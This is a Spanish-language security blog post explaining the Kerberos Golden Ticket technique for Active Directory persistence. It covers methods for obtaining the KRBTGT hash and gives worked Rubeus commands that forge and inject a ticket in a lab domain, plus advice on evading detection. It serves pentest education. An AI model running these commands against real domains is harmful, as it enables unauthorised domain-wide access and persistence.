Seguridad

Tickets Kerberos – Golden Ticket


Hoy vamos a hablar sobre una de las diferentes técnicas que solemos llevar a cabo sobre pentest interno

Una vez que un atacante logra comprometer un dominio tras alcanzar privilegios altos, como por ejemplo Domain Admin o Enterprise Admin, es muy difícil para una organización recuperar el control total del bosque y considerarlo 100% limpio.

Los atacantes con este acceso pueden hacer uso de sus altos privilegios para extraer credenciales especiales del dominio y utilizarlas para ganar persistencia, pudiendo volver a obtener accesos como cualquier usuario en cualquier momento. Estas credenciales se modifican raramente o incluso no se modifican nunca, lo que otorga a los atacantes un acceso prácticamente ilimitado.

A lo largo de diferentes publicaciones, vamos a ver algunas de estas técnicas de persistencia, las cuales se basan en el uso de tickets de Kerberos.

GOLDEN TICKET

Un ataque Golden Ticket consiste en la creación de un Ticket Granting Ticket (TGT) legítimo que se hace pasar por cualquier usuario mediante el uso del hash NTLM de la cuenta KRBTGT de Active Directory. Esta técnica es particularmente poderosa, ya que permite el acceso a cualquier servicio o máquina dentro del dominio como el usuario suplantado. Es fundamental recordar que las credenciales de la cuenta KRBTGT nunca se actualizan automáticamente.

Para adquirir el hash NTLM de la cuenta KRBTGT, se pueden emplear varios métodos:

  • Se puede extraer de la memoria, realizando un volcado del proceso LSASS (Local Security Authority Subsystem Service) de un Controlador de Dominio.
  • También se puede extraer del archivo de servicios de directorio NT (NTDS.dit) ubicado en cualquier Controlador de Dominio.
  • O bien se puede obtener tras ejecutar un ataque DCsync, que se puede realizar utilizando herramientas como Mimikatz o el script secretsdump.py de Impacket.

Es importante mencionar que, para realizar estas operaciones, normalmente se requieren privilegios de Domain Admin o un nivel similar de acceso (auth/system). Por esta razón, los Golden Tickets son utilizados para realizar movimientos laterales por el resto del dominio, así como establecer persistencia y no para la escalada de privilegios.

Al igual que en el caso de Silver Ticket, aunque el hash NTLM sirve como un método viable para este propósito, se recomienda la ejecución de este ataque utilizando las claves AES (Advanced Encryption Standard) de Kerberos por razones de seguridad operativa y ser menos detectable.

Impacto

Un Golden Ticket permite acceso ilimitado y persistente a cualquier recurso dentro del dominio hasta que la clave KRBTGT se cambie, lo cual puede ser un proceso complejo y disruptivo.

Explotación

Para este escenario, partimos de la base de un dominio comprometido, donde tenemos credenciales de Domain Admin y hemos logrado realizar la técnica de DCSync, obteniendo así las claves de Kerberos de la cuenta KRBTGT.

Creación del ticket

Para crear el Golden Ticket, podemos hacer uso de la herramienta Rubeus y ejecutar el siguiente comando:

Rubeus.exe golden /aes256: 42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /user:Eddard.stark /domain:north.sevenkingdoms.local /sid:S-1-5-21-1430251130-2586379517-4083755373 /nowrap

  • Aes256: Clave aes256 de la cuenta KRBTGT extraída anteriormente
  • User: Usuario a impersonalizar, en este caso un Domain Admin
  • Domain: Nombre del dominio
  • Sid: SID del dominio

Importar el ticket

Una vez obtenido el ticket, podemos comprobar que no tenemos acceso mediante SMB al Controlador de Dominio.

ls \winterfellc$


Para ganar acceso, primero importamos el ticket en nuestra sesión. Podemos hacer uso de Rubeus de nuevo para lograrlo:

Rubeus.exe createnetonly /program:C:WindowsSystem32cmd.exe /domain:NORTH /username:Eddard.stark /password:PassFake /ticket: doIGDDCCBgigAwI[…]tcy5sb2NhbA==


  • Program: Comando a ejecutar donde se inyectará el ticket
  • Domain: Nombre del dominio
  • Username: Usuario del dominio
  • Password: Contraseña del usuario. No es necesario conocer la contraseña real del usuario
  • Ticket: El ticket creado anteriormente

Una vez importado el ticket, podemos acceder al DC.

ls \winterfellc$


Os dejamos ciertos aspectos a tener en cuenta cuando pensamos en la posibilidad de un Golden Ticket.

Credenciales Necesarias


Característica Golden Ticket
Objetivo Acceso a todo el dominio
Credenciales Necesarias Administrador de dominio o KRBTGT
Impacto Acceso ilimitado en el dominio
Complejidad del ataque Alta
Contramedidas Clave Protección de KRBTGT, monitoreo exhaustivo


Y hasta aquí de tickets y no precisamente de feria, nos vemos en la próxima entrega.

Álvaro Temes, Analista de ciberseguridad en Zerolynx.

Powered by WPeMatico

Gustavo Genez

Informático de corazón y apasionado por la tecnología. La misión de este blog es llegar a los usuarios y profesionales con información y trucos acerca de la Seguridad Informática.